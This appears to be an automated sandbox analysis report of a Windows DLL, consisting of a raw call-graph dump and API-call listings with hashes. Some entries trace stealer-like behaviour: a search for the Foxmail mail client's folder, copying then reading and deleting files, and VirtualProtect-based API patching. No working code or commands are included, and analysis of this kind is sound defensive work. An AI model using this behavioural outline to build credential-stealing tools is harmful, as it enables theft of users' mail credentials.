6082->6084 6083 213610ca 6083->6079 6085 21361e89 5 API calls 6083->6085 6084->6079 6095 2136173a 6084->6095 6086 213610df 6085->6086 6108 213611ea 6086->6108 6090 21362c40 ___scrt_fastfail 6089->6090 6091 21361ea7 lstrcatW lstrlenW 6090->6091 6092 21361ec2 6091->6092 6093 21361ed1 lstrcatW 6091->6093 6092->6093 6094 21361ec7 lstrlenW 6092->6094 6093->6082 6094->6093 6096 21361747 ___scrt_fastfail 6095->6096 6123 21361cca 6096->6123 6100 2136199f 6100->6079 6101 21361824 ___scrt_fastfail _strlen 6101->6100 6143 213615da 6101->6143 6104 21361e29 6103->6104 6107 21361e4c 6103->6107 6105 21361e2d lstrlenW 6104->6105 6104->6107 6106 21361e3f lstrlenW 6105->6106 6105->6107 6106->6107 6107->6083 6109 2136120e ___scrt_fastfail 6108->6109 6110 21361e89 5 API calls 6109->6110 6111 21361220 GetFileAttributesW 6110->6111 6112 21361246 6111->6112 6113 21361235 6111->6113 6114 21361e89 5 API calls 6112->6114 6113->6112 6116 2136173a 35 API calls 6113->6116 6115 21361258 6114->6115 6117 213610f1 56 API calls 6115->6117 6116->6112 6118 2136126d 6117->6118 6119 21361e89 5 API calls 6118->6119 6120 2136127f ___scrt_fastfail 6119->6120 6121 213610f1 56 API calls 6120->6121 6122 213612e6 6121->6122 6122->6079 6124 21361cf1 ___scrt_fastfail 6123->6124 6125 21361d0f CopyFileW CreateFileW 6124->6125 6126 21361d44 DeleteFileW 6125->6126 6127 21361d55 GetFileSize 6125->6127 6132 21361808 6126->6132 6128 21361ede 22 API calls 6127->6128 6129 21361d66 ReadFile 6128->6129 6130 21361d94 CloseHandle DeleteFileW 6129->6130 6131 21361d7d CloseHandle DeleteFileW 6129->6131 6130->6132 6131->6132 6132->6100 6133 21361ede 6132->6133 6135 2136222f 6133->6135 6136 2136224e 6135->6136 6138 21362250 6135->6138 6151 2136474f 6135->6151 6156 213647e5 6135->6156 6136->6101 6139 21362908 6138->6139 6163 213635d2 6138->6163 6140 213635d2 __CxxThrowException@8 RaiseException 6139->6140 6142 21362925 6140->6142 6142->6101 6144 2136160c _strcat _strlen 6143->6144 6145 2136163c lstrlenW 6144->6145 6243 21361c9d 
6145->6243 6147 21361655 lstrcatW lstrlenW 6148 21361678 6147->6148 6149 21361693 ___scrt_fastfail 6148->6149 6150 2136167e lstrcatW 6148->6150 6149->6101 6150->6149 6166 21364793 6151->6166 6153 21362ada _ValidateLocalCookies 5 API calls 6154 2136478f 6153->6154 6154->6135 6155 21364765 6155->6153 6161 213656d0 _abort 6156->6161 6157 2136570e 6177 21366368 6157->6177 6158 213656f9 RtlAllocateHeap 6160 2136570c 6158->6160 6158->6161 6160->6135 6161->6157 6161->6158 6162 2136474f _abort 7 API calls 6161->6162 6162->6161 6165 213635f2 RaiseException 6163->6165 6165->6139 6167 2136479f ___scrt_is_nonwritable_in_current_image 6166->6167 6172 21365671 RtlEnterCriticalSection 6167->6172 6169 213647aa 6173 213647dc 6169->6173 6171 213647d1 _abort 6171->6155 6172->6169 6176 213656b9 RtlLeaveCriticalSection 6173->6176 6175 213647e3 6175->6171 6176->6175 6180 21365b7a GetLastError 6177->6180 6181 21365b93 6180->6181 6182 21365b99 6180->6182 6199 21365e08 6181->6199 6186 21365bf0 SetLastError 6182->6186 6206 2136637b 6182->6206 6188 21365bf9 6186->6188 6188->6160 6189 21365bb3 6213 2136571e 6189->6213 6192 21365bb9 6194 21365be7 SetLastError 6192->6194 6193 21365bcf 6226 2136593c 6193->6226 6194->6188 6197 2136571e _free 17 API calls 6198 21365be0 6197->6198 6198->6186 6198->6194 6231 21365c45 6199->6231 6201 21365e2f 6202 21365e47 TlsGetValue 6201->6202 6203 21365e3b 6201->6203 6202->6203 6204 21362ada _ValidateLocalCookies 5 API calls 6203->6204 6205 21365e58 6204->6205 6205->6182 6211 21366388 _abort 6206->6211 6207 213663b3 RtlAllocateHeap 6209 21365bab 6207->6209 6207->6211 6208 213663c8 6210 21366368 _free 19 API calls 6208->6210 6209->6189 6219 21365e5e 6209->6219 6210->6209 6211->6207 6211->6208 6212 2136474f _abort 7 API calls 6211->6212 6212->6211 6214 21365752 _free 6213->6214 6215 21365729 HeapFree 6213->6215 6214->6192 6215->6214 6216 2136573e 6215->6216 6217 21366368 _free 18 API calls 6216->6217 6218 21365744 GetLastError 6217->6218 6218->6214 6220 21365c45 
_abort 5 API calls 6219->6220 6221 21365e85 6220->6221 6222 21365ea0 TlsSetValue 6221->6222 6223 21365e94 6221->6223 6222->6223 6224 21362ada _ValidateLocalCookies 5 API calls 6223->6224 6225 21365bc8 6224->6225 6225->6189 6225->6193 6237 21365914 6226->6237 6232 21365c75 __crt_fast_encode_pointer 6231->6232 6234 21365c71 6231->6234 6232->6201 6233 21365ce1 _abort LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 6233->6234 6234->6232 6234->6233 6236 21365c95 6234->6236 6235 21365ca1 GetProcAddress 6235->6232 6236->6232 6236->6235 6238 21365854 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 6237->6238 6239 21365938 6238->6239 6240 213658c4 6239->6240 6241 21365758 _abort 20 API calls 6240->6241 6242 213658e8 6241->6242 6242->6197 6244 21361ca6 _strlen 6243->6244 6244->6147 6245 213620db 6246 213620e7 ___scrt_is_nonwritable_in_current_image 6245->6246 6247 21362110 dllmain_raw 6246->6247 6249 213620f6 6246->6249 6254 2136210b 6246->6254 6248 2136212a 6247->6248 6247->6249 6258 21361eec 6248->6258 6251 21362177 6251->6249 6252 21361eec 31 API calls 6251->6252 6253 2136218a 6252->6253 6253->6249 6255 21362193 dllmain_raw 6253->6255 6254->6249 6254->6251 6256 21361eec 31 API calls 6254->6256 6255->6249 6257 2136216d dllmain_raw 6256->6257 6257->6251 6259 21361ef7 6258->6259 6260 21361f2a dllmain_crt_process_detach 6258->6260 6261 21361f1c dllmain_crt_process_attach 6259->6261 6262 21361efc 6259->6262 6265 21361f06 6260->6265 6261->6265 6263 21361f12 6262->6263 6264 21361f01 6262->6264 6273 213623ec 6263->6273 6264->6265 6268 2136240b 6264->6268 6265->6254 6281 213653e5 6268->6281 6402 21363513 6273->6402 6278 21362408 6278->6265 6279 2136351e 7 API calls 6280 213623f5 6279->6280 6280->6265 6287 21365aca 6281->6287 6284 2136351e 6391 21363820 6284->6391 6286 21362415 6286->6265 6288 21365ad4 6287->6288 6289 21362410 6287->6289 6290 21365e08 _abort 11 API calls 6288->6290 6289->6284 6291 21365adb 6290->6291 6291->6289 6292 21365e5e _abort 11 API calls 
6291->6292 6293 21365aee 6292->6293 6295 213659b5 6293->6295 6296 213659d0 6295->6296 6297 213659c0 6295->6297 6296->6289 6301 213659d6 6297->6301 6300 2136571e _free 20 API calls 6300->6296 6302 213659ef 6301->6302 6303 213659e9 6301->6303 6305 2136571e _free 20 API calls 6302->6305 6304 2136571e _free 20 API calls 6303->6304 6304->6302 6306 213659fb 6305->6306 6307 2136571e _free 20 API calls 6306->6307 6308 21365a06 6307->6308 6309 2136571e _free 20 API calls 6308->6309 6310 21365a11 6309->6310 6311 2136571e _free 20 API calls 6310->6311 6312 21365a1c 6311->6312 6313 2136571e _free 20 API calls 6312->6313 6314 21365a27 6313->6314 6315 2136571e _free 20 API calls 6314->6315 6316 21365a32 6315->6316 6317 2136571e _free 20 API calls 6316->6317 6318 21365a3d 6317->6318 6319 2136571e _free 20 API calls 6318->6319 6320 21365a48 6319->6320 6321 2136571e _free 20 API calls 6320->6321 6322 21365a56 6321->6322 6327 2136589c 6322->6327 6333 213657a8 6327->6333 6329 213658c0 6330 213658ec 6329->6330 6346 21365809 6330->6346 6332 21365910 6332->6300 6334 213657b4 ___scrt_is_nonwritable_in_current_image 6333->6334 6341 21365671 RtlEnterCriticalSection 6334->6341 6336 213657e8 6342 213657fd 6336->6342 6338 213657be 6338->6336 6340 2136571e _free 20 API calls 6338->6340 6339 213657f5 _abort 6339->6329 6340->6336 6341->6338 6345 213656b9 RtlLeaveCriticalSection 6342->6345 6344 21365807 6344->6339 6345->6344 6347 21365815 ___scrt_is_nonwritable_in_current_image 6346->6347 6354 21365671 RtlEnterCriticalSection 6347->6354 6349 2136581f 6355 21365a7f 6349->6355 6351 21365832 6359 21365848 6351->6359 6353 21365840 _abort 6353->6332 6354->6349 6356 21365ab5 __fassign 6355->6356 6357 21365a8e __fassign 6355->6357 6356->6351 6357->6356 6362 21367cc2 6357->6362 6390 213656b9 RtlLeaveCriticalSection 6359->6390 6361 21365852 6361->6353 6363 21367d42 6362->6363 6366 21367cd8 6362->6366 6365 2136571e _free 20 API calls 6363->6365 6388 21367d90 6363->6388 6364 21367e35 __fassign 20 API calls 
6378 21367d9e 6364->6378 6367 21367d64 6365->6367 6366->6363 6368 21367d0b 6366->6368 6372 2136571e _free 20 API calls 6366->6372 6369 2136571e _free 20 API calls 6367->6369 6374 2136571e _free 20 API calls 6368->6374 6389 21367d2d 6368->6389 6370 21367d77 6369->6370 6373 2136571e _free 20 API calls 6370->6373 6371 2136571e _free 20 API calls 6375 21367d37 6371->6375 6377 21367d00 6372->6377 6380 21367d85 6373->6380 6381 21367d22 6374->6381 6382 2136571e _free 20 API calls 6375->6382 6376 21367dfe 6383 2136571e _free 20 API calls 6376->6383 6379 213690ba ___free_lconv_mon 20 API calls 6377->6379 6378->6376 6386 2136571e 20 API calls _free 6378->6386 6379->6368 6384 2136571e _free 20 API calls 6380->6384 6385 213691b8 __fassign 20 API calls 6381->6385 6382->6363 6387 21367e04 6383->6387 6384->6388 6385->6389 6386->6378 6387->6356 6388->6364 6389->6371 6390->6361 6392 2136382d 6391->6392 6396 2136384b ___vcrt_freefls@4 6391->6396 6393 2136383b 6392->6393 6397 21363b67 6392->6397 6394 21363ba2 ___vcrt_FlsSetValue 6 API calls 6393->6394 6394->6396 6396->6286 6398 21363a82 try_get_function 5 API calls 6397->6398 6399 21363b81 6398->6399 6400 21363b99 TlsGetValue 6399->6400 6401 21363b8d 6399->6401 6400->6401 6401->6393 6408 21363856 6402->6408 6404 213623f1 6404->6280 6405 213653da 6404->6405 6406 21365b7a _abort 20 API calls 6405->6406 6407 213623fd 6406->6407 6407->6278 6407->6279 6409 21363862 GetLastError 6408->6409 6410 2136385f 6408->6410 6411 21363b67 ___vcrt_FlsGetValue 6 API calls 6409->6411 6410->6404 6412 21363877 6411->6412 6413 213638dc SetLastError 6412->6413 6414 21363ba2 ___vcrt_FlsSetValue 6 API calls 6412->6414 6419 21363896 6412->6419 6413->6404 6415 21363890 6414->6415 6416 213638b8 6415->6416 6418 21363ba2 ___vcrt_FlsSetValue 6 API calls 6415->6418 6415->6419 6417 21363ba2 ___vcrt_FlsSetValue 6 API calls 6416->6417 6416->6419 6417->6419 6418->6416 6419->6413 7462 21362418 7464 21362420 ___scrt_release_startup_lock 7462->7464 7466 213647f5 7464->7466 
7465 21362448 7467 21364804 7466->7467 7468 21364808 7466->7468 7467->7465 7471 21364815 7468->7471 7472 21365b7a _abort 20 API calls 7471->7472 7475 2136482c 7472->7475 7473 21362ada _ValidateLocalCookies 5 API calls 7474 21364811 7473->7474 7474->7465 7475->7473 7399 2136a1c6 IsProcessorFeaturePresent 7400 21367bc7 7401 21367bd3 ___scrt_is_nonwritable_in_current_image 7400->7401 7402 21367c0a _abort 7401->7402 7408 21365671 RtlEnterCriticalSection 7401->7408 7404 21367be7 7409 21367f86 7404->7409 7408->7404 7410 21367bf7 7409->7410 7411 21367f94 __fassign 7409->7411 7413 21367c10 7410->7413 7411->7410 7412 21367cc2 __fassign 20 API calls 7411->7412 7412->7410 7416 213656b9 RtlLeaveCriticalSection 7413->7416 7415 21367c17 7415->7402 7416->7415 6470 2136a945 6472 2136a96d 6470->6472 6471 2136a9a5 6472->6471 6473 2136a997 6472->6473 6474 2136a99e 6472->6474 6479 2136aa17 6473->6479 6483 2136aa00 6474->6483 6480 2136aa20 6479->6480 6487 2136b19b 6480->6487 6484 2136aa20 6483->6484 6485 2136b19b __startOneArgErrorHandling 21 API calls 6484->6485 6486 2136a9a3 6485->6486 6488 2136b1da __startOneArgErrorHandling 6487->6488 6493 2136b25c __startOneArgErrorHandling 6488->6493 6497 2136b59e 6488->6497 6490 2136b286 6492 2136b292 6490->6492 6504 2136b8b2 6490->6504 6495 21362ada _ValidateLocalCookies 5 API calls 6492->6495 6493->6490 6500 213678a3 6493->6500 6496 2136a99c 6495->6496 6511 2136b5c1 6497->6511 6501 213678cb 6500->6501 6502 21362ada _ValidateLocalCookies 5 API calls 6501->6502 6503 213678e8 6502->6503 6503->6490 6505 2136b8d4 6504->6505 6506 2136b8bf 6504->6506 6507 21366368 _free 20 API calls 6505->6507 6508 2136b8d9 6506->6508 6509 21366368 _free 20 API calls 6506->6509 6507->6508 6508->6492 6510 2136b8cc 6509->6510 6510->6492 6512 2136b5ec __raise_exc 6511->6512 6513 2136b7e5 RaiseException 6512->6513 6514 2136b5bc 6513->6514 6514->6493 6420 21367103 GetCommandLineA GetCommandLineW 6421 21365303 6424 213650a5 6421->6424 6433 2136502f 6424->6433 6427 2136502f 
5 API calls 6428 213650c3 6427->6428 6437 21365000 6428->6437 6431 21365000 20 API calls 6432 213650d9 6431->6432 6436 21365048 6433->6436 6434 21362ada _ValidateLocalCookies 5 API calls 6435 21365069 6434->6435 6435->6427 6436->6434 6438 2136502a 6437->6438 6439 2136500d 6437->6439 6438->6431 6440 21365024 6439->6440 6441 2136571e _free 20 API calls 6439->6441 6442 2136571e _free 20 API calls 6440->6442 6441->6439 6442->6438 6515 2136af43 6516 2136af4d 6515->6516 6517 2136af59 6515->6517 6516->6517 6518 2136af52 CloseHandle 6516->6518 6518->6517 7512 21368640 7515 21368657 7512->7515 7516 21368665 7515->7516 7517 21368679 7515->7517 7518 21366368 _free 20 API calls 7516->7518 7519 21368693 7517->7519 7520 21368681 7517->7520 7521 2136866a 7518->7521 7525 213654a7 __fassign 38 API calls 7519->7525 7527 21368652 7519->7527 7522 21366368 _free 20 API calls 7520->7522 7523 213662ac _abort 26 API calls 7521->7523 7524 21368686 7522->7524 7523->7527 7526 213662ac _abort 26 API calls 7524->7526 7525->7527 7526->7527 7683 21367a80 7684 21367a8d 7683->7684 7685 2136637b _abort 20 API calls 7684->7685 7686 21367aa7 7685->7686 7687 2136571e _free 20 API calls 7686->7687 7688 21367ab3 7687->7688 7689 2136637b _abort 20 API calls 7688->7689 7693 21367ad9 7688->7693 7690 21367acd 7689->7690 7692 2136571e _free 20 API calls 7690->7692 7691 21365eb7 11 API calls 7691->7693 7692->7693 7693->7691 7694 21367ae5 7693->7694 7695 21367b43 7693->7695 7528 2136724e GetProcessHeap 7529 2136284f 7530 21362882 std::exception::exception 27 API calls 7529->7530 7531 2136285d 7530->7531 6018 2136220c 6019 21362215 6018->6019 6020 2136221a dllmain_dispatch 6018->6020 6022 213622b1 6019->6022 6023 213622c7 6022->6023 6025 213622d0 6023->6025 6026 21362264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6023->6026 6025->6020 6026->6025 6519 21365348 6520 21363529 ___vcrt_uninitialize 8 API calls 6519->6520 6521 2136534f 6520->6521 6522 21367b48 6532 21368ebf 
[Edge list for the remainder of the module-wide execution graph (nodes 6522 to 7702), which the report renders as an image; the raw node/edge dump is omitted here. Besides the CRT's own helpers (_free, _abort, __dosmaperr, ___scrt_is_nonwritable_in_current_image, ___scrt_fastfail, ___scrt_release_startup_lock, _ValidateLocalCookies, __fassign, __RTC_Initialize, ___vcrt_uninitialize, ___vcrt_uninitialize_ptd), the nodes in this part resolve to RtlEnterCriticalSection, RtlLeaveCriticalSection, RtlDeleteCriticalSection, RtlInterlockedFlushSList, IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, ExitProcess, GetModuleHandleW, GetModuleHandleExW, GetProcAddress, FreeLibrary, GetPEB, WriteFile, WriteConsoleW, CreateFileW, GetConsoleCP, GetConsoleMode, WideCharToMultiByte, SetFilePointerEx, SetStdHandle, CloseHandle, GetLastError and SetLastError.]

                    Control-flow Graph

                    APIs
                    • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 21361137
                    • lstrcatW.KERNEL32(?,?), ref: 21361151
                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2136115C
                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2136116D
                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2136117C
                    • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 21361193
                    • FindNextFileW.KERNELBASE(00000000,00000010), ref: 213611D0
                    • FindClose.KERNELBASE(00000000), ref: 213611DB
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                    • String ID:
                    • API String ID: 1083526818-0
                    • Opcode ID: 7a25d93faef2d2edd72855d774ab37eba1fe2120f17253664f79f218a79a5663
                    • Instruction ID: 87082b1bc3d719b8523b73db196e76ebcb5ca396cf06c1a4ef553db76704ee0b
                    • Opcode Fuzzy Hash: 7a25d93faef2d2edd72855d774ab37eba1fe2120f17253664f79f218a79a5663
                    • Instruction Fuzzy Hash: 4B21D572944389ABD721EBA59C48F9B7BDDEF84354F00092AF998D3190E734D60487AA

                    Control-flow Graph

                    APIs
                    • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 21361434
                      • Part of subcall function 213610F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 21361137
                      • Part of subcall function 213610F1: lstrcatW.KERNEL32(?,?), ref: 21361151
                      • Part of subcall function 213610F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2136115C
                      • Part of subcall function 213610F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2136116D
                      • Part of subcall function 213610F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2136117C
                      • Part of subcall function 213610F1: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 21361193
                      • Part of subcall function 213610F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 213611D0
                      • Part of subcall function 213610F1: FindClose.KERNELBASE(00000000), ref: 213611DB
                    • lstrlenW.KERNEL32(?), ref: 213614C5
                    • lstrlenW.KERNEL32(?), ref: 213614E0
                    • lstrlenW.KERNEL32(?,?), ref: 2136150F
                    • lstrcatW.KERNEL32(00000000), ref: 21361521
                    • lstrlenW.KERNEL32(?,?), ref: 21361547
                    • lstrcatW.KERNEL32(00000000), ref: 21361553
                    • lstrlenW.KERNEL32(?,?), ref: 21361579
                    • lstrcatW.KERNEL32(00000000), ref: 21361585
                    • lstrlenW.KERNEL32(?,?), ref: 213615AB
                    • lstrcatW.KERNEL32(00000000), ref: 213615B7
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                    • String ID: )$Foxmail$ProgramFiles
                    • API String ID: 672098462-2938083778
                    • Opcode ID: 8458e4efcca682b961dbf222a22be87b2b13c22d258e48c8d564634688d3f224
                    • Instruction ID: b6e4a10b61a557ba1589fbbf79149fb5823b8a2f694e18d221e5efea45c8a019
                    • Opcode Fuzzy Hash: 8458e4efcca682b961dbf222a22be87b2b13c22d258e48c8d564634688d3f224
                    • Instruction Fuzzy Hash: B881E171A00358A9DF20CBA5DC85FEE733EEF84704F000596FA08E7194EA755A85CB98

                    Control-flow Graph

                    APIs
                    • GetModuleHandleA.KERNEL32(2136C7DD), ref: 2136C7E6
                    • GetModuleHandleA.KERNEL32(?,2136C7DD), ref: 2136C838
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 2136C860
                      • Part of subcall function 2136C803: GetProcAddress.KERNEL32(00000000,2136C7F4), ref: 2136C804
                      • Part of subcall function 2136C803: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,2136C7F4,2136C7DD), ref: 2136C816
                      • Part of subcall function 2136C803: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,2136C7F4,2136C7DD), ref: 2136C82A
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: AddressHandleModuleProcProtectVirtual
                    • String ID:
                    • API String ID: 2099061454-0
                    • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                    • Instruction ID: babf482798fc4a8c37ee54b5f216a7d438ccd560ddf6e6bd47e6647d1c175250
                    • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                    • Instruction Fuzzy Hash: 9601C0009452DE2CFB3156794C05AAAAF9E9B27678B10165AA240C619BD9A48506C3FE

                    Control-flow Graph

                    [Basic-block graph for 2136c7a7 to 2136c872; executed and not-executed blocks are distinguished only by colour in the rendered image, so the edge list is omitted. The blocks call GetModuleHandleA, GetProcAddress and VirtualProtect, and the function calls into 2136c7e6 and 2136c877.]
                    APIs
                    • GetModuleHandleA.KERNEL32(?,2136C7DD), ref: 2136C838
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 2136C860
                      • Part of subcall function 2136C7E6: GetModuleHandleA.KERNEL32(2136C7DD), ref: 2136C7E6
                      • Part of subcall function 2136C7E6: GetProcAddress.KERNEL32(00000000,2136C7F4), ref: 2136C804
                      • Part of subcall function 2136C7E6: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,2136C7F4,2136C7DD), ref: 2136C816
                      • Part of subcall function 2136C7E6: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,2136C7F4,2136C7DD), ref: 2136C82A
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: AddressHandleModuleProcProtectVirtual
                    • String ID:
                    • API String ID: 2099061454-0
                    • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                    • Instruction ID: 7ff0b0b061e8d95ce0c66448cdc0fa1da54b0f08aaa28ed734d475b2786dbcec
                    • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                    • Instruction Fuzzy Hash: D52127214082CA6FE7328B788C04AA67FDE9F27278F18069AD140CB147D5A88555C3FE

                    Control-flow Graph

                    [Basic-block graph for 2136c803 to 2136c872; executed and not-executed blocks are distinguished only by colour in the rendered image, so the edge list is omitted. The blocks call GetProcAddress, VirtualProtect (twice), GetModuleHandleA and GetProcAddress again, and the function calls into 2136c877.]
                    APIs
                    • GetProcAddress.KERNEL32(00000000,2136C7F4), ref: 2136C804
                    • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,2136C7F4,2136C7DD), ref: 2136C816
                    • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,2136C7F4,2136C7DD), ref: 2136C82A
                    • GetModuleHandleA.KERNEL32(?,2136C7DD), ref: 2136C838
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 2136C860
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: AddressProcProtectVirtual$HandleModule
                    • String ID:
                    • API String ID: 2152742572-0
                    • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                    • Instruction ID: 05ce6d80f8dcbcc6313d09320e7127f5f04781a0da13fa76bd63b52c16d64937
                    • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                    • Instruction Fuzzy Hash: 19F0C2415452CD3CFB3145B80C45EBA9FCE8B37678B101A5AE204C718BD8A9850683FE

                    Control-flow Graph

                    [Basic-block graph for 2136731f to 213673d4; executed and not-executed blocks are distinguished only by colour in the rendered image, so the edge list is omitted. The blocks call GetStdHandle and GetFileType.]
                    APIs
                    • GetStdHandle.KERNEL32(000000F6), ref: 2136736B
                    • GetFileType.KERNELBASE(00000000), ref: 2136737D
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: FileHandleType
                    • String ID:
                    • API String ID: 3000768030-0
                    • Opcode ID: 0b30d5be96a79b854785aedcbc227c682f7a5df7061268897269aada57c87a38
                    • Instruction ID: 410914b41b8d0dd00a697abb55558f164c2e724579fc87d06a8443b9506fa341
                    • Opcode Fuzzy Hash: 0b30d5be96a79b854785aedcbc227c682f7a5df7061268897269aada57c87a38
                    • Instruction Fuzzy Hash: 8C11DA31204BC286D3314E3E8C86A12BE9FA747178B74071DDDB6C66F9D334D58682C8

                    Control-flow Graph

                    [Basic-block graph for 21361eec to 21361f3c; executed and not-executed blocks are distinguished only by colour in the rendered image, so the edge list is omitted. The blocks call dllmain_crt_process_attach and dllmain_crt_process_detach, and the function calls into 213623ec and 2136240b.]
                    APIs
                    • dllmain_crt_process_attach.LIBCMT ref: 21361F22
                    • dllmain_crt_process_detach.LIBCMT ref: 21361F35
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: dllmain_crt_process_attachdllmain_crt_process_detach
                    • String ID:
                    • API String ID: 3750050125-0
                    • Opcode ID: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                    • Instruction ID: ebdbc60234eb150ad9824978d68ddac2c0ef8f381f560bff3a9b2c7351368b8a
                    • Opcode Fuzzy Hash: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                    • Instruction Fuzzy Hash: 04E065328581CB9EDB015FB89815A6D3EDFA7B224DF004B2AA5418D16CC735C258D16D
                    APIs
                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 213661DA
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 213661E4
                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 213661F1
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                    • String ID:
                    • API String ID: 3906539128-0
                    • Opcode ID: 0fe45435b174d2658ba89fd09b1042d7e1e67c87516d3cf5dfff1615dfc5111d
                    • Instruction ID: 43ae443f4647e51271a2f9f70d9ff2ff11c958bc23150a17b20bf7bb7e73f482
